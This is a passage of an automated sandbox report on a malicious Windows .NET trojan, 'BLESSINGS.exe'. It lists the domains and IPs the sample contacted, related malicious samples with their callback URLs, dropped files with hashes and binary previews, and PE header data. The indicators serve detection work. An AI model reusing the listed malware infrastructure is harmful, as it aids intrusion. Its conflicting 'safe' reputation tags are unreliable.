                            http://www.margosbest.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kornteengoods.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.cositasdepachecos.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.com/jqc/www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.screwtaped.com/jqc/www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sterlworldshop.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.toweroflifeinc.com/jqc/www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.margosbest.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.the343radio.com/jqc/www.droriginals.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.droriginals.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_landeraserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.quintred.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.internetmarkaching.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.hotvidzhub.download/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kornteengoods.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.the343radio.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.asacal.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    91.195.241.137
                                    		unknownGermany
                                    		47846SEDO-ASDEtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:339345
                                    Start date:13.01.2021
                                    Start time:21:23:17
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:BLESSINGS.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/2@3/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 13.3% (good quality ratio 11.9%)
                                    • Quality average: 72.2%
                                    • Quality standard deviation: 32%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 168.61.161.212, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:24:17API Interceptor192x Sleep call for process: BLESSINGS.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    91.195.241.137cGLVytu1ps.exeGet hashmaliciousBrowse
                                    • www.classifoods.com/oean/?-Z_PiP=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&DxoHn=2dmDC
                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                    • www.rickettes.com/c8so/?Wx=nr13ryrphK0zlVsXiKvBnhVbi2g9KzOxyG/5i6d6/itGVNMIJOgEnWNtcgBznYTvqCjN&vB=lhr0E
                                    Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                    • www.defendertools.com/hpg3/?C0D=_DK4YF6&b8=zHX/nmfsF2jpuhEInZeCqq2GVgZZL3mtp8n3HsHw+mqNo1ANa4F80opyPi8dR1VNXBNhng6QAg==
                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                    • www.riqinxin.com/h3qo/?mvHpc=93uRhCEwEUrVxxSjD+1b7A9hC/wpsrLkGIubP/xXjIPRWK+AIZW10n7E32UYS1kyVof9&sPj8=mh84WN0PyZRt
                                    zz4osC4FRa.exeGet hashmaliciousBrowse
                                    • www.tueddur.com/oean/?1ba0AP=BB3DgipVrPXVUiW5UQyK0nVxujvhMnc98thgbH7+/hDQNSDSTCs9gH0Ux4g93clBab5W&uHrt=FdiDzjvx
                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                    • www.eggsmission.com/oean/?wxl=3k/zNET3fDBgs70PCwEkAozdXz/XsTdoJbX3JEkHEqIeGwjgimGxO6vnXb2/67RN1xF5&Tj=YvFHu
                                    4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                    • www.classifoods.com/oean/?lTB=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&Bvg=yL0LRZtXKrL
                                    SecuriteInfo.com.Trojan.Inject4.6535.29715.exeGet hashmaliciousBrowse
                                    • www.metanoria.com/kgw/?bn=yVFP8nI8&iN9tKjex=rooDW/IWxvqP4FsNUlFVETkjioyNarIrVVTP+1Jd9BYlAChzvHXiPw+dal/TLdMzQ7Xw
                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                    • www.enavaorganics.com/qef6/?D0G=CSX4d1pD2kLRKFDlO4tCA0cLgGHmTgpjHEbnWeNZOOkUyG5Q5sUwopSNN7KMXAMbmA9R&Q2J=fjlpdDePPPndHZ
                                    rtgs_pdf.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?mL08q=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDvHfmPWsuiRw&9rn=DhodLVupGVRTP
                                    P.O-45.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?RHR=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&3f=YnOlnZfXtJb
                                    order FTH2004-005.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?EPq8iH=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&CX6pD=7n9piL3
                                    invv.exeGet hashmaliciousBrowse
                                    • www.fwk.xyz/hko6/?2d=onela&-Z2hnx=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr
                                    ins.exeGet hashmaliciousBrowse
                                    • www.fwk.xyz/hko6/?FDHH=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr&Rb=Vtx06
                                    http://exform.com/flbookcounter/bookid.phpGet hashmaliciousBrowse
                                    • exform.com/search/tsc.php?200=MjExNzU4NDg5&21=ODQuMTcuNTIuMjU=&681=MTYwNzQ0NTA1Mzc4YjJkNzdjZGVlMDEwNTdhMGE1MTc5MjdmYjY2YTk2&crc=99325bc99b2534dbb1e8ae9053770a91bbe8417c&cv=1
                                    http://moviejoy.toGet hashmaliciousBrowse
                                    • moviejoy.to/
                                    PO11272020.xlsxGet hashmaliciousBrowse
                                    • www.gedefo.com/zsh/
                                    ptFIhqUe89.exeGet hashmaliciousBrowse
                                    • www.bostonrealestate.club/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=/yqXkG2lSpYuwVXBVRCnSHuV3ulBryT1KsOGiBOC3E9h0rTdOIqyr7GAs5aIBhUmKjlm
                                    EME.39134.xlsxGet hashmaliciousBrowse
                                    • www.oyagu.com/mfg6/?rF=_HCtZ4&yzux_nSp=cnnW0LVOybN2chQ+0+pD4+tuKDmdXLYWsjvHUhFw4C6tCTmFc0h1VdXTZsfKhcluhQRUVw==
                                    Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                    • www.pestigenix.com/kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    SEDO-ASDEorden pdf.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.docGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    cGLVytu1ps.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Consignment Details.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Purchase Order -263.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    zz4osC4FRa.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    SecuriteInfo.com.Trojan.Inject4.6535.29715.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Pending PURCHASE ORDER - 47001516.pdf.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    order no. 3643.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    Details!!!!.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    rtgs_pdf.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    http://walmartprepaid.comGet hashmaliciousBrowse
                                    • 91.195.240.136
                                    P.O-45.exeGet hashmaliciousBrowse
                                    • 91.195.241.137

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exeQP-0766.scr.exeGet hashmaliciousBrowse
                                      order-181289654312464648.exeGet hashmaliciousBrowse
                                        PO_60577.exeGet hashmaliciousBrowse
                                          IMG_73344332#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                              Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Generic.mg.15368412abd71685.exeGet hashmaliciousBrowse
                                                  RT-05723.exeGet hashmaliciousBrowse
                                                    Dekont.pdf.exeGet hashmaliciousBrowse
                                                      cFAWQ1mv83.exeGet hashmaliciousBrowse
                                                        I7313Y5Rr2.exeGet hashmaliciousBrowse
                                                          SWIFT-COPY Payment advice3243343.exeGet hashmaliciousBrowse
                                                            bWVvaTptgL.exeGet hashmaliciousBrowse
                                                              umOXxQ9PFS.exeGet hashmaliciousBrowse
                                                                BL,IN&PL.exeGet hashmaliciousBrowse
                                                                  ORDER #0554.exeGet hashmaliciousBrowse
                                                                    Dekont.pdf.exeGet hashmaliciousBrowse
                                                                      IMG_84755643#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                        8WLxD8uxRN.exeGet hashmaliciousBrowse
                                                                          Quotation.exeGet hashmaliciousBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1451
                                                                            Entropy (8bit):5.345862727722058
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
                                                                            MD5:06F54CDBFEF62849AF5AE052722BD7B6
                                                                            SHA1:FB0250AAC2057D0B5BCE4CE130891E428F28DA05
                                                                            SHA-256:4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
                                                                            SHA-512:34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                            C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):42080
                                                                            Entropy (8bit):6.2125074198825105
                                                                            Encrypted:false
                                                                            SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                            MD5:F2A47587431C466535F3C3D3427724BE
                                                                            SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                            SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                            SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: QP-0766.scr.exe, Detection: malicious, Browse
                                                                            • Filename: order-181289654312464648.exe, Detection: malicious, Browse
                                                                            • Filename: PO_60577.exe, Detection: malicious, Browse
                                                                            • Filename: IMG_73344332#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                            • Filename: Doc#6620200947535257653.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Generic.mg.15368412abd71685.exe, Detection: malicious, Browse
                                                                            • Filename: RT-05723.exe, Detection: malicious, Browse
                                                                            • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                            • Filename: cFAWQ1mv83.exe, Detection: malicious, Browse
                                                                            • Filename: I7313Y5Rr2.exe, Detection: malicious, Browse
                                                                            • Filename: SWIFT-COPY Payment advice3243343.exe, Detection: malicious, Browse
                                                                            • Filename: bWVvaTptgL.exe, Detection: malicious, Browse
                                                                            • Filename: umOXxQ9PFS.exe, Detection: malicious, Browse
                                                                            • Filename: BL,IN&PL.exe, Detection: malicious, Browse
                                                                            • Filename: ORDER #0554.exe, Detection: malicious, Browse
                                                                            • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                            • Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                            • Filename: 8WLxD8uxRN.exe, Detection: malicious, Browse
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.56178131875686
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:BLESSINGS.exe
                                                                            File size:3427840
                                                                            MD5:30cb872994e8a0a4a635b06bfbe38006
                                                                            SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
                                                                            SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
                                                                            SHA512:57bc48f7c2e77d28f13cd52dadeaa24a50a8eafb0316c2b7894e49cbe17fb16f14efe4f7b7568ef3ae40c7e6ec0a07862ec9bd91541be477795f7c113a4816d1
                                                                            SSDEEP:98304:p+F0ah/YomABaKJCmwLyxWIyzhIpJj7d29wYG:p+FPheKcqo3+V7
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..N.................B4.........~`4.. ........@.. ........................4...........`................................

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x74607e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                            Time Stamp:0x4EC1C53F [Tue Nov 15 01:49:51 2011 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3460280x53.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3480000x62a.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x34a0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
